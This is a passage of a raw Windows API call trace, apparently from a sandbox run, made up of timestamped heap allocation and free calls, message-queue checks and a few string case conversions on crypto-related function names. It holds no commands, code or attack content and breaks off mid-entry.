RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ef) returned 0x4516010 [0115.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0115.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0115.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0115.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0115.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ef) returned 0x4529308 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.996] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ef) returned 0x4516010 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0115.996] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0115.996] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0115.996] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0115.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0115.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2730 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ef) returned 0x4516010 [0115.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2820 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28c0 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0115.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0115.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ef) returned 0x499a008 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0116.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0116.000] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0116.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.001] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0116.001] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0116.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0116.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0116.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0116.002] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0116.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0116.002] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0116.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0116.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0116.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0116.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0116.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.003] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0116.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0116.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0116.004] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0116.004] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0116.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0116.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0116.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0116.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0116.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0116.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0116.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, 